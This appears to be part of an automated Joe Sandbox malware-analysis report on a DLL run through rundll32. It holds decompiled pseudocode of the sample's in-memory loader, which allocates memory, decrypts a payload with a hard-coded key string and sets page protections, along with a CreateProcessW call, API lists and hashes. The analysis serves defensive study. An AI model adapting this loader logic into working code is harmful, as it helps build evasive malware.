                                                                                                        					_t47 = E10017716("8192") | 0x00001000;
                                                                                                        					__eflags = _t47;
                                                                                                        					_v12 = VirtualAlloc(0, _v36, _t47, _t45);
                                                                                                        				} else {
                                                                                                        					_t63 =  *0x10058eb8(0xffffffff, 0, _v36, E10017716("8192") | 0x00001000, E10017716(0x10029b18), 0); // executed
                                                                                                        					_v12 = _t63;
                                                                                                        				}
                                                                                                        				E10016A10(_t64, _t78, _t79, _v12, 0x10032098, _v36);
                                                                                                        				_t68 =  *0x10056f04; // 0x730f
                                                                                                        				_v16 = E1001703B(_t64, _v36, _t78, _t79, _t68);
                                                                                                        				E10002FA0(_t95, _v16, "vzyxQQjtnPpM1kMtP2^c)toAOgGzJnA(x4n)mZV?Zgqbqls>&28Kb303hUncVaad@?N*A%W2eBhDNd+m_Bl2cFznqh*vrDpHPGj%?_!pbLp", 0x6c);
                                                                                                        				E10004F00(_v16, _v12, _v36);
                                                                                                        				_t56 = E10002D20(0x10058ebc, _v12, _v36); // executed
                                                                                                        				 *0x10058edc = _t56;
                                                                                                        				ShowWindow(0, _v40);
                                                                                                        				return 1;
                                                                                                        			}























                                                                                                        0x100088e0
                                                                                                        0x100088e0
                                                                                                        0x100088e0
                                                                                                        0x100088e9
                                                                                                        0x100088ef
                                                                                                        0x100088f5
                                                                                                        0x100088f8
                                                                                                        0x10008901
                                                                                                        0x10008906
                                                                                                        0x1000890d
                                                                                                        0x10008914
                                                                                                        0x1000891b
                                                                                                        0x10008922
                                                                                                        0x10008929
                                                                                                        0x10008930
                                                                                                        0x10008966
                                                                                                        0x1000896b
                                                                                                        0x00000000
                                                                                                        0x10008973
                                                                                                        0x10008932
                                                                                                        0x1000893c
                                                                                                        0x10008946
                                                                                                        0x10008950
                                                                                                        0x1000895a
                                                                                                        0x1000897a
                                                                                                        0x10008981
                                                                                                        0x10008988
                                                                                                        0x1000898f
                                                                                                        0x10008996
                                                                                                        0x1000899d
                                                                                                        0x100089a4
                                                                                                        0x100089b8
                                                                                                        0x100089c8
                                                                                                        0x100089dc
                                                                                                        0x100089f2
                                                                                                        0x100089f7
                                                                                                        0x100089fe
                                                                                                        0x10008a3b
                                                                                                        0x10008a51
                                                                                                        0x10008a51
                                                                                                        0x10008a63
                                                                                                        0x10008a00
                                                                                                        0x10008a2b
                                                                                                        0x10008a31
                                                                                                        0x10008a31
                                                                                                        0x10008a73
                                                                                                        0x10008a7b
                                                                                                        0x10008a8a
                                                                                                        0x10008a98
                                                                                                        0x10008aac
                                                                                                        0x10008ac1
                                                                                                        0x10008ac6
                                                                                                        0x10008ad1
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                          • Part of subcall function 10008860: _malloc.LIBCMT ref: 1000886B
                                                                                                        • _printf.LIBCMT ref: 1000896B
                                                                                                        • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00024E00,00000000,00000000,00000000), ref: 10008A2B
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00024E00,00000000,00000000), ref: 10008A5D
                                                                                                        • _malloc.LIBCMT ref: 10008A82
                                                                                                        • ShowWindow.USER32(00000000,0044368D,00000000,00024E00), ref: 10008AD1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual_malloc$NumaShowWindow_printf
                                                                                                        • String ID: +';$8192$`/$kernel32.dll$ntdll.dll$vzyxQQjtnPpM1kMtP2^c)toAOgGzJnA(x4n)mZV?Zgqbqls>&28Kb303hUncVaad@?N*A%W2eBhDNd+m_Bl2cFznqh*vrDpHPGj%?_!pbLp
                                                                                                        • API String ID: 1487653210-3670691644
                                                                                                        • Opcode ID: 230bbdfcd20e835c4d7365e9bc9cc9309c602f396e76a36ffbf0d77b2387037d
                                                                                                        • Instruction ID: 74e036033439e47f0f6271ee42a165f027743cdfe4c2c4d01037afcb8f86e406
                                                                                                        • Opcode Fuzzy Hash: 230bbdfcd20e835c4d7365e9bc9cc9309c602f396e76a36ffbf0d77b2387037d
                                                                                                        • Instruction Fuzzy Hash: FE5141F5D00214AFEB00CF90EC96BAE77B4FB48344F144528E909BB345E775A6448BA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 80%
                                                                                                        			E10013A9B() {
                                                                                                        				struct _CRITICAL_SECTION* _v4;
                                                                                                        				char _v28;
                                                                                                        				char _v36;
                                                                                                        				char _v44;
                                                                                                        				intOrPtr _v56;
                                                                                                        				void* __ebx;
                                                                                                        				intOrPtr __ecx;
                                                                                                        				signed int __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				struct _CRITICAL_SECTION* _t39;
                                                                                                        				intOrPtr _t40;
                                                                                                        				void* _t41;
                                                                                                        				long _t44;
                                                                                                        				void* _t45;
                                                                                                        				signed int* _t51;
                                                                                                        				intOrPtr _t64;
                                                                                                        				long _t68;
                                                                                                        				void* _t69;
                                                                                                        				void* _t70;
                                                                                                        				signed int _t72;
                                                                                                        				intOrPtr _t78;
                                                                                                        				signed int _t82;
                                                                                                        				void* _t86;
                                                                                                        				signed int _t88;
                                                                                                        				void* _t90;
                                                                                                        				void* _t91;
                                                                                                        				void* _t93;
                                                                                                        
                                                                                                        				_push(_t72);
                                                                                                        				_push(_t69);
                                                                                                        				_push(_t88);
                                                                                                        				_t86 = _t72;
                                                                                                        				_t1 = _t86 + 0x1c; // 0x1005aaa8
                                                                                                        				_t39 = _t1;
                                                                                                        				_v4 = _t39;
                                                                                                        				EnterCriticalSection(_t39);
                                                                                                        				_t3 = _t86 + 4; // 0x20
                                                                                                        				_t40 =  *_t3;
                                                                                                        				_t4 = _t86 + 8; // 0x3
                                                                                                        				_t82 =  *_t4;
                                                                                                        				if(_t82 >= _t40) {
                                                                                                        					L7:
                                                                                                        					_t82 = 1;
                                                                                                        					__eflags = _t40 - 1;
                                                                                                        					if(_t40 <= 1) {
                                                                                                        						L12:
                                                                                                        						_t21 = _t40 + 0x20; // 0x40
                                                                                                        						_t88 = _t21;
                                                                                                        						_t22 = _t86 + 0x10; // 0x2eb0550
                                                                                                        						_t41 =  *_t22;
                                                                                                        						__eflags = _t41;
                                                                                                        						if(__eflags != 0) {
                                                                                                        							_t69 = GlobalHandle(_t41);
                                                                                                        							GlobalUnlock(_t69);
                                                                                                        							_t44 = E100134F9(_t72, __eflags, _t88, 8);
                                                                                                        							_t72 = 0x2002;
                                                                                                        							_t45 = GlobalReAlloc(_t69, _t44, ??);
                                                                                                        						} else {
                                                                                                        							_t68 = E100134F9(_t72, __eflags, _t88, 8);
                                                                                                        							_pop(_t72);
                                                                                                        							_t45 = GlobalAlloc(2, _t68); // executed
                                                                                                        						}
                                                                                                        						__eflags = _t45;
                                                                                                        						if(_t45 != 0) {
                                                                                                        							_t70 = GlobalLock(_t45);
                                                                                                        							_t25 = _t86 + 4; // 0x20
                                                                                                        							__eflags = _t88 -  *_t25 << 3;
                                                                                                        							E100174D0(_t82, _t70 +  *_t25 * 8, 0, _t88 -  *_t25 << 3);
                                                                                                        							 *(_t86 + 4) = _t88;
                                                                                                        							 *(_t86 + 0x10) = _t70;
                                                                                                        							goto L20;
                                                                                                        						} else {
                                                                                                        							_t23 = _t86 + 0x10; // 0x2eb0550
                                                                                                        							_t86 =  *_t23;
                                                                                                        							__eflags = _t86;
                                                                                                        							if(_t86 != 0) {
                                                                                                        								GlobalLock(GlobalHandle(_t86));
                                                                                                        							}
                                                                                                        							LeaveCriticalSection(_v4);
                                                                                                        							_push(_t88);
                                                                                                        							_t90 = _t93;
                                                                                                        							_push(_t72);
                                                                                                        							_v28 = 0x10057168;
                                                                                                        							E10017C83( &_v28, 0x1002e258);
                                                                                                        							asm("int3");
                                                                                                        							_push(_t90);
                                                                                                        							_t91 = _t93;
                                                                                                        							_push(_t72);
                                                                                                        							_v36 = 0x10057200;
                                                                                                        							E10017C83( &_v36, 0x1002e2b8);
                                                                                                        							asm("int3");
                                                                                                        							_push(_t91);
                                                                                                        							_push(_t72);
                                                                                                        							_v44 = 0x10057298;
                                                                                                        							E10017C83( &_v44, 0x1002e2fc);
                                                                                                        							asm("int3");
                                                                                                        							_push(4);
                                                                                                        							E10017BC1(E10027DEC, _t69, _t82, _t86);
                                                                                                        							_t78 = E10013965(0x104);
                                                                                                        							_v56 = _t78;
                                                                                                        							_t64 = 0;
                                                                                                        							_v44 = 0;
                                                                                                        							if(_t78 != 0) {
                                                                                                        								_t64 = E1000CF71(_t78);
                                                                                                        							}
                                                                                                        							return E10017C60(_t64);
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						_t18 = _t86 + 0x10; // 0x2eb0550
                                                                                                        						_t72 =  *_t18 + 8;
                                                                                                        						__eflags = _t72;
                                                                                                        						while(1) {
                                                                                                        							__eflags =  *_t72 & 0x00000001;
                                                                                                        							if(( *_t72 & 0x00000001) == 0) {
                                                                                                        								break;
                                                                                                        							}
                                                                                                        							_t82 = _t82 + 1;
                                                                                                        							_t72 = _t72 + 8;
                                                                                                        							__eflags = _t82 - _t40;
                                                                                                        							if(_t82 < _t40) {
                                                                                                        								continue;
                                                                                                        							}
                                                                                                        							break;
                                                                                                        						}
                                                                                                        						__eflags = _t82 - _t40;
                                                                                                        						if(_t82 < _t40) {
                                                                                                        							goto L20;
                                                                                                        						} else {
                                                                                                        							goto L12;
                                                                                                        						}
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					_t13 = __esi + 0x10; // 0x2eb0550
                                                                                                        					__ecx =  *_t13;
                                                                                                        					__eflags =  *(__ecx + __edi * 8) & 0x00000001;
                                                                                                        					if(( *(__ecx + __edi * 8) & 0x00000001) == 0) {
                                                                                                        						L20:
                                                                                                        						_t30 = _t86 + 0xc; // 0x3
                                                                                                        						__eflags = _t82 -  *_t30;
                                                                                                        						if(_t82 >=  *_t30) {
                                                                                                        							_t31 = _t82 + 1; // 0x4
                                                                                                        							 *((intOrPtr*)(_t86 + 0xc)) = _t31;
                                                                                                        						}
                                                                                                        						_t33 = _t86 + 0x10; // 0x2eb0550
                                                                                                        						_t51 =  *_t33 + _t82 * 8;
                                                                                                        						 *_t51 =  *_t51 | 0x00000001;
                                                                                                        						__eflags =  *_t51;
                                                                                                        						_t37 = _t82 + 1; // 0x4
                                                                                                        						 *(_t86 + 8) = _t37;
                                                                                                        						LeaveCriticalSection(_v4);
                                                                                                        						return _t82;
                                                                                                        					} else {
                                                                                                        						goto L7;
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}































                                                                                                        0x10013a9b
                                                                                                        0x10013a9c
                                                                                                        0x10013a9d
                                                                                                        0x10013a9f
                                                                                                        0x10013aa1
                                                                                                        0x10013aa1
                                                                                                        0x10013aa6
                                                                                                        0x10013aaa
                                                                                                        0x10013ab0
                                                                                                        0x10013ab0
                                                                                                        0x10013ab3
                                                                                                        0x10013ab3
                                                                                                        0x10013ab8
                                                                                                        0x10013ac7
                                                                                                        0x10013ac9
                                                                                                        0x10013aca
                                                                                                        0x10013acc
                                                                                                        0x10013ae9
                                                                                                        0x10013ae9
                                                                                                        0x10013ae9
                                                                                                        0x10013aec
                                                                                                        0x10013aec
                                                                                                        0x10013aef
                                                                                                        0x10013af1
                                                                                                        0x10013b0f
                                                                                                        0x10013b12
                                                                                                        0x10013b20
                                                                                                        0x10013b26
                                                                                                        0x10013b29
                                                                                                        0x10013af3
                                                                                                        0x10013af6
                                                                                                        0x10013afc
                                                                                                        0x10013b00
                                                                                                        0x10013b00
                                                                                                        0x10013b2f
                                                                                                        0x10013b31
                                                                                                        0x10013b5e
                                                                                                        0x10013b60
                                                                                                        0x10013b67
                                                                                                        0x10013b71
                                                                                                        0x10013b79
                                                                                                        0x10013b7c
                                                                                                        0x00000000
                                                                                                        0x10013b33
                                                                                                        0x10013b33
                                                                                                        0x10013b33
                                                                                                        0x10013b36
                                                                                                        0x10013b38
                                                                                                        0x10013b42
                                                                                                        0x10013b42
                                                                                                        0x10013b4c
                                                                                                        0x1000a0a7
                                                                                                        0x1000a0a8
                                                                                                        0x1000a0aa
                                                                                                        0x1000a0b4
                                                                                                        0x1000a0bb
                                                                                                        0x1000a0c0
                                                                                                        0x1000a0c1
                                                                                                        0x1000a0c2
                                                                                                        0x1000a0c4
                                                                                                        0x1000a0ce
                                                                                                        0x1000a0d5
                                                                                                        0x1000a0da
                                                                                                        0x1000a0db
                                                                                                        0x1000a0de
                                                                                                        0x1000a0e8
                                                                                                        0x1000a0ef
                                                                                                        0x1000a0f4
                                                                                                        0x1000a0f5
                                                                                                        0x1000a0fc
                                                                                                        0x1000a10b
                                                                                                        0x1000a10d
                                                                                                        0x1000a110
                                                                                                        0x1000a114
                                                                                                        0x1000a117
                                                                                                        0x1000a119
                                                                                                        0x1000a119
                                                                                                        0x1000a123
                                                                                                        0x1000a123
                                                                                                        0x10013ace
                                                                                                        0x10013ace
                                                                                                        0x10013ad1
                                                                                                        0x10013ad1
                                                                                                        0x10013ad4
                                                                                                        0x10013ad4
                                                                                                        0x10013ad7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10013ad9
                                                                                                        0x10013ada
                                                                                                        0x10013add
                                                                                                        0x10013adf
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10013adf
                                                                                                        0x10013ae1
                                                                                                        0x10013ae3
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10013ae3
                                                                                                        0x10013aba
                                                                                                        0x10013aba
                                                                                                        0x10013aba
                                                                                                        0x10013abd
                                                                                                        0x10013ac1
                                                                                                        0x10013b7f
                                                                                                        0x10013b7f
                                                                                                        0x10013b7f
                                                                                                        0x10013b82
                                                                                                        0x10013b84
                                                                                                        0x10013b87
                                                                                                        0x10013b87
                                                                                                        0x10013b8a
                                                                                                        0x10013b91
                                                                                                        0x10013b94
                                                                                                        0x10013b94
                                                                                                        0x10013b97
                                                                                                        0x10013b9a
                                                                                                        0x10013b9d
                                                                                                        0x10013baa
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10013ac1

                                                                                                        APIs
                                                                                                        • EnterCriticalSection.KERNEL32(1005AAA8,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004), ref: 10013AAA
                                                                                                        • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10013B00
                                                                                                        • GlobalHandle.KERNEL32(02EB0550), ref: 10013B09
                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004), ref: 10013B12
                                                                                                        • GlobalReAlloc.KERNEL32 ref: 10013B29
                                                                                                        • GlobalHandle.KERNEL32(02EB0550), ref: 10013B3B
                                                                                                        • GlobalLock.KERNEL32 ref: 10013B42
                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004), ref: 10013B4C
                                                                                                        • GlobalLock.KERNEL32 ref: 10013B58
                                                                                                        • _memset.LIBCMT ref: 10013B71
                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 10013B9D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 496899490-0
                                                                                                        • Opcode ID: db40230195121c03edd1d9de773089a9b398076d37fb16ef380e98a53d4696a6
                                                                                                        • Instruction ID: d2dedea389880cd6532a8cc41d1f31ca5a81082a511f3f96b23d25218acb7329
                                                                                                        • Opcode Fuzzy Hash: db40230195121c03edd1d9de773089a9b398076d37fb16ef380e98a53d4696a6
                                                                                                        • Instruction Fuzzy Hash: 5F31C1312043129FE720CF34CC8DA2A77E9FF84280B12891DE996C7651EB30F885CB10
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 27%
                                                                                                        			E10016380(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				intOrPtr* _t10;
                                                                                                        				intOrPtr _t13;
                                                                                                        				intOrPtr _t23;
                                                                                                        				void* _t25;
                                                                                                        
                                                                                                        				_push(0xc);
                                                                                                        				_push(0x1002f780);
                                                                                                        				_t8 = E1001984C(__ebx, __edi, __esi);
                                                                                                        				_t23 =  *((intOrPtr*)(_t25 + 8));
                                                                                                        				if(_t23 == 0) {
                                                                                                        					L9:
                                                                                                        					return E10019891(_t8);
                                                                                                        				}
                                                                                                        				if( *0x1005c984 != 3) {
                                                                                                        					_push(_t23);
                                                                                                        					L7:
                                                                                                        					_push(0);
                                                                                                        					_t8 = RtlFreeHeap( *0x1005ad4c); // executed
                                                                                                        					_t31 = _t8;
                                                                                                        					if(_t8 == 0) {
                                                                                                        						_t10 = E10017D62(_t31);
                                                                                                        						 *_t10 = E10017D27(GetLastError());
                                                                                                        					}
                                                                                                        					goto L9;
                                                                                                        				}
                                                                                                        				E1001A549(4);
                                                                                                        				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                                                                                        				_t13 = E1001A5C2(_t23);
                                                                                                        				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                                                                                                        				if(_t13 != 0) {
                                                                                                        					_push(_t23);
                                                                                                        					_push(_t13);
                                                                                                        					E1001A5ED();
                                                                                                        				}
                                                                                                        				 *(_t25 - 4) = 0xfffffffe;
                                                                                                        				_t8 = E100163D6();
                                                                                                        				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                                                                                                        					goto L9;
                                                                                                        				} else {
                                                                                                        					_push( *((intOrPtr*)(_t25 + 8)));
                                                                                                        					goto L7;
                                                                                                        				}
                                                                                                        			}







                                                                                                        0x10016380
                                                                                                        0x10016382
                                                                                                        0x10016387
                                                                                                        0x1001638c
                                                                                                        0x10016391
                                                                                                        0x10016408
                                                                                                        0x1001640d
                                                                                                        0x1001640d
                                                                                                        0x1001639a
                                                                                                        0x100163df
                                                                                                        0x100163e0
                                                                                                        0x100163e0
                                                                                                        0x100163e8
                                                                                                        0x100163ee
                                                                                                        0x100163f0
                                                                                                        0x100163f2
                                                                                                        0x10016405
                                                                                                        0x10016407
                                                                                                        0x00000000
                                                                                                        0x100163f0
                                                                                                        0x1001639e
                                                                                                        0x100163a4
                                                                                                        0x100163a9
                                                                                                        0x100163af
                                                                                                        0x100163b4
                                                                                                        0x100163b6
                                                                                                        0x100163b7
                                                                                                        0x100163b8
                                                                                                        0x100163be
                                                                                                        0x100163bf
                                                                                                        0x100163c6
                                                                                                        0x100163cf
                                                                                                        0x00000000
                                                                                                        0x100163d1
                                                                                                        0x100163d1
                                                                                                        0x00000000
                                                                                                        0x100163d1

                                                                                                        APIs
                                                                                                        • __lock.LIBCMT ref: 1001639E
                                                                                                          • Part of subcall function 1001A549: __mtinitlocknum.LIBCMT ref: 1001A55D
                                                                                                          • Part of subcall function 1001A549: __amsg_exit.LIBCMT ref: 1001A569
                                                                                                          • Part of subcall function 1001A549: EnterCriticalSection.KERNEL32(00000001,00000001,?,1001C014,0000000D,1002FA58,00000008,1001C106,00000001,?,?,00000001,?,?,10017AE8,00000001), ref: 1001A571
                                                                                                        • ___sbh_find_block.LIBCMT ref: 100163A9
                                                                                                        • ___sbh_free_block.LIBCMT ref: 100163B8
                                                                                                        • RtlFreeHeap.NTDLL(00000000,?,1002F780,0000000C,1001BF6A,00000000,?,1001E73B,?,00000001,00000001,1001A4D3,00000018,1002F8C0,0000000C,1001A562), ref: 100163E8
                                                                                                        • GetLastError.KERNEL32(?,1001E73B,?,00000001,00000001,1001A4D3,00000018,1002F8C0,0000000C,1001A562,00000001,00000001,?,1001C014,0000000D,1002FA58), ref: 100163F9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                        • String ID:
                                                                                                        • API String ID: 2714421763-0
                                                                                                        • Opcode ID: 933a214dfe2b721a1172918ae6127c9818b4b1158d9b2876c596c2397cc5b652
                                                                                                        • Instruction ID: 632ebcc47bfd7d50c2ae726889ea94072d2ceb4c664f4e9832d4c107bd8c1e1e
                                                                                                        • Opcode Fuzzy Hash: 933a214dfe2b721a1172918ae6127c9818b4b1158d9b2876c596c2397cc5b652
                                                                                                        • Instruction Fuzzy Hash: EE01D635805326EBEF20DBB4AC0AB9D3BF4EF053A0F214109F554AE091CB34EAC19A64
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 225 30b2c24-30b2d09 call 30afe29 call 309eb52 CreateProcessW
                                                                                                        APIs
                                                                                                        • CreateProcessW.KERNELBASE(?,2E751909,00000000,00000000,00534833,00000000,00000000,00000000,?,?), ref: 030B2D02
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.303938818.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.303934318.0000000003090000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.303955009.00000000030B6000.00000004.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_3090000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID: 3HS
                                                                                                        • API String ID: 963392458-330188696
                                                                                                        • Opcode ID: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
                                                                                                        • Instruction ID: 829cfb81a36cde37e3f8c8324e6274a07615324e48364ce7b463e0afc93c366a
                                                                                                        • Opcode Fuzzy Hash: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
                                                                                                        • Instruction Fuzzy Hash: 9D21F372801248BBCF159F96DC0ACDFBFB9EF85700F108189F915A2220C3B58A24DFA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 230 100021d0-100021e0 231 100021e2-100021e7 230->231 232 100021ec-100021f8 230->232 233 100022ec-100022ef 231->233 234 10002254-100022b6 232->234 235 100021fa-10002205 232->235 236 100022c4-100022e1 VirtualProtect 234->236 237 100022b8-100022c1 234->237 238 10002207-1000220e 235->238 239 1000224a-1000224f 235->239 240 100022e3-100022e5 236->240 241 100022e7 236->241 237->236 242 10002210-1000221e 238->242 243 10002232-10002244 VirtualFree 238->243 239->233 240->233 241->233 242->243 244 10002220-10002230 242->244 243->239 244->239 244->243
                                                                                                        C-Code - Quality: 82%
                                                                                                        			E100021D0(intOrPtr __ecx, intOrPtr* _a4, void** _a8) {
                                                                                                        				long _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				signed int _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				int _t67;
                                                                                                        
                                                                                                        				_v28 = __ecx;
                                                                                                        				if(_a8[2] != 0) {
                                                                                                        					if((_a8[3] & 0x02000000) == 0) {
                                                                                                        						asm("sbb ecx, ecx");
                                                                                                        						_v16 =  ~( ~(_a8[3] & 0x20000000));
                                                                                                        						asm("sbb eax, eax");
                                                                                                        						_v24 =  ~( ~(_a8[3] & 0x40000000));
                                                                                                        						asm("sbb edx, edx");
                                                                                                        						_v12 =  ~( ~(_a8[3] & 0x80000000));
                                                                                                        						_t39 = _v24 * 8; // 0x10056f20
                                                                                                        						_v20 =  *((intOrPtr*)((_v16 << 4) + _t39 + 0x10056f20 + _v12 * 4));
                                                                                                        						if((_a8[3] & 0x04000000) != 0) {
                                                                                                        							_v20 = _v20 | 0x00000200;
                                                                                                        						}
                                                                                                        						_t67 = VirtualProtect( *_a8, _a8[2], _v20,  &_v8); // executed
                                                                                                        						if(_t67 != 0) {
                                                                                                        							return 1;
                                                                                                        						} else {
                                                                                                        							return 0;
                                                                                                        						}
                                                                                                        					}
                                                                                                        					if( *_a8 == _a8[1] && (_a8[4] != 0 ||  *((intOrPtr*)( *_a4 + 0x38)) ==  *(_a4 + 0x30) || _a8[2] %  *(_a4 + 0x30) == 0)) {
                                                                                                        						VirtualFree( *_a8, _a8[2], 0x4000); // executed
                                                                                                        					}
                                                                                                        					return 1;
                                                                                                        				}
                                                                                                        				return 1;
                                                                                                        			}










                                                                                                        0x100021d6
                                                                                                        0x100021e0
                                                                                                        0x100021f8
                                                                                                        0x10002262
                                                                                                        0x10002266
                                                                                                        0x10002276
                                                                                                        0x1000227a
                                                                                                        0x1000228b
                                                                                                        0x1000228f
                                                                                                        0x1000229b
                                                                                                        0x100022a8
                                                                                                        0x100022b6
                                                                                                        0x100022c1
                                                                                                        0x100022c1
                                                                                                        0x100022d9
                                                                                                        0x100022e1
                                                                                                        0x00000000
                                                                                                        0x100022e3
                                                                                                        0x00000000
                                                                                                        0x100022e3
                                                                                                        0x100022e1
                                                                                                        0x10002205
                                                                                                        0x10002244
                                                                                                        0x10002244
                                                                                                        0x00000000
                                                                                                        0x1000224a
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • VirtualFree.KERNELBASE(00000000,?,00004000,?,10002468,00000001,00000000,?,10002C68,?,?,?,?,10002C68,00000000,00000000), ref: 10002244
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 1263568516-0
                                                                                                        • Opcode ID: 47f32b032b7fce0672a30d9b107070a1881b22e5365e79d9d7a5c7562cbc9459
                                                                                                        • Instruction ID: def7816fd77fd5aef653724919a03fde70f7e86383ff2ba96e4cf8bb5acc80b5
                                                                                                        • Opcode Fuzzy Hash: 47f32b032b7fce0672a30d9b107070a1881b22e5365e79d9d7a5c7562cbc9459
